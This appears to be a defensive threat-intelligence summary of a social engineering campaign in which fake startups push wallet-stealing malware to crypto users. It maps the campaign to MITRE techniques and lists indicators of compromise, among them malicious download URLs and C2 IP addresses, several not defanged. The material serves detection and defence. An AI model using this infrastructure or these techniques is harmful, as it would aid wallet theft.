The article details a continuing elaborate social engineering campaign targeting cryptocurrency users, where threat actors create fake AI, gaming, and Web3 startups to lure victims into downloading malware that drains wallets. It highlights use of compromised X (Twitter) accounts, Notion/Medium/GitHub fronts, cross‑platform delivery via Windows Electron apps and macOS DMG, stolen code signing certificates, and anti‑analysis techniques, linked to groups like CrazyEvil and the Meeten campaign. #AtomicStealer #EternalDecay #CrazyEvil #MeetenCampaign #CryptoWalletDrain
Keypoints
- Threat actors deploy fake startup campaigns on X, Medium, Notion and GitHub to persuade victims to install wallet-stealing software.
- They exploit compromised verified X accounts to lend legitimacy and reach targets.
- Delivery includes Windows Electron applications and macOS DMGs, sometimes signed with stolen certificates to appear credible.
- The operation uses obfuscation, anti-sandboxing and other anti‑analysis techniques, with macOS persistence via Launch Agent.
- IoCs include dozens of fake company domains, social media profiles, and C2 infrastructure endpoints.
MITRE Techniques
- [T1566.003] Spearphishing via Service – The actors contact victims through social channels to lure them into downloading a malicious binary. ‘Each campaign typically starts with a victim being contacted through X messages, Telegram or Discord.’
- [T1078] Valid Accounts – Attackers exploit compromised X accounts (typically verified) to contact victims and present a legitimate facade. ‘Some of the observed X accounts appear to be compromised accounts that typically are verified and have a higher number of followers and following…’
- [T1116] Code Signing – Stolen code signing certificates used to sign Windows binaries to evade detection. ‘The certificates of two legitimate companies Jiangyin Fengyuan Electronics Co., Ltd. and Paperbucketmdb ApS (revoked as of June 2025) were used during this campaign.’
- [T1059.006] AppleScript – AppleScript is used in the macOS deployment chain. ‘AppleScript is being used.’
- [T1027] Obfuscated/Compressed Files and Information – Bash script obfuscated with junk, base64 and XOR’d. ‘The bash script is obfuscated with junk, base64 and is XOR’d.’
- [T1497.001] Virtualization/Sandbox Evasion – Anti‑analysis checks for QEMU, VMware and Docker-OSX. ‘anti-analysis checks for QEMU, VMWare and Docker-OSX…’
- [T1547.001] Launch Agent – macOS persistence via Launch Agent to run at user login. ‘Launch Agent to run at login.’
- [T1555.003] Credentials from Web Browsers – Information stealer targets browser data and crypto wallets. ‘steal data from stores including browser data, crypto wallets, cookies and documents.’
- [T1041] Exfiltration Over C2 – Stolen data is compressed and exfiltrated to a remote C2. ‘data is compressed into /tmp/out.zip and sent via POST request to 45[.]94[.]47[.]167/contact.’
Indicators of Compromise
- [Domain] Manboon[.]com, gaetanorealty[.]com, Troveur[.]com, Bigpinellas[.]com, Dsandbox[.]com, Conceptwo[.]com, Aceartist[.]com, turismoelcasco[.]com, Ekodirect[.]com
- [URL] https://mrajhhosdoahjsd[.]com, https://isnimitz.com/zxc/app[.]zip
- [IP] 45.94.47.112, 45.94.47.167, 77.73.129.18
- [File] app.zip, install.sh, SwoxApp, InstallerHelper.app
Read more: https://darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam